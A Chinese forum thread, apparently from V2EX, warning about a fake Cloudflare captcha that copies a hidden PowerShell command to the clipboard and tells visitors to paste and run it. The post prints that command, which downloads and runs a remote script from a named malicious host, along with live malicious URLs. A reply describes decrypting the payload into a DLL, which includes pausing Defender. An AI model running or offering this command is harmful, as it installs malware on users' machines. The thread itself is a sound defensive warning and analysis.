这是一个创建于 229 天前的主题,其中的信息可能已经有所发展或是发生改变。
请勿点击以下链接或运行任何相关代码,可能导致电脑遭受攻击!!!
今天遇到了一件非常值得警惕的事情,希望分享出来提醒大家。我在浏览 GitHub issue 时,从回复中点击了一个链接:https://newrides.es/captha/cap/。页面显示的是一个看似正常的 Cloudflare 验证框,当时没多想就点击了按钮。
然而,验证却提示我的浏览器不支持,并引导我点击一个 Fix it! 按钮。我立马点击了这个按钮。紧接着,网站弹出了以下三步指示:
- 按
Win+R按钮 - 按
Ctrl+V按钮 - 按
Enter按钮
就在这时,网站悄悄地往我的剪贴板里复制了一段 PowerShell 代码:
powershell -WindowStyle Hidden -Command ([ScriptBlock]::Create((irm http://customamusement.com/pagecable/guardoffice))).Invoke() 我立刻意识到这是一个 PowerShell 脚本,其作用是静默下载并执行来自 http://customamusement.com/pagecable/guardoffice 的远程脚本。这极有可能是一个木马程序或者后门!
出于好奇,我打开了远程链接查看了代码,发现内容是从 http://customamusement.com/pagecable/walkbutter 下载一个文件并执行,但是这个文件经过 RC4 加密,直接查看内容是乱码,短时间内难以分析其具体恶意行为,感兴趣的 v 友可以分析一下。
之所以发这个帖子,是因为这种攻击手法非常狡猾,利用了用户对 Cloudflare 验证的信任以及急于解决问题的心理,极易被用于传播木马、后门或其他恶意软件。我幸运地在执行 Enter 那一步停了下来,但很多不熟悉计算机的用户很可能会毫无防备地运行这段代码,或者仅仅因为好奇点击了链接,从而导致电脑被入侵。 
6 条回复 2025-04-11 13:27:33 +08:00
 | 1 SeleiXi 229 天前 到最后这两步感觉手法也太挫劣了,第一步整个页面看着也不像正常网站 |
 | 2 miaomiao888 229 天前 nextdns 很快哈 https://ibb.co/F4k5nPHK |
 | 3 UnluckyNinja 229 天前 via Android |
 | 4 cst4you 229 天前 很多 steam 假入库也是这样搞的, 给你塞个 dll 然后魔改 steam |
 | 5 geelaw 229 天前  1 不需要多复杂的分析,那个 RC4 加密是无意义的,因为代码里提供了密钥。 guardoffice 里面删除 $puritynote = [System.AppDomain]::CurrentDomain.Load($solutionlens) if ($puritynote.EntryPoint -ne $null) { $puritynote.EntryPoint.Invoke($null, @(@())) } 之后的代码就是安全的了(不会执行没看见的代码),执行这部分得到 $solutionlens 是一个 byte[],于是 [System.IO.File]::WriteAllBytes('C:\walkbutter.dll', $solutionlens) 你会发现 Defender 立刻告诉你这是病毒。暂停 Defender ,重新保存一次,然后用 ILSpy 查看,会发现是混淆过的代码。 到这里我就没有继续往下看了,不值得。 |
Select Language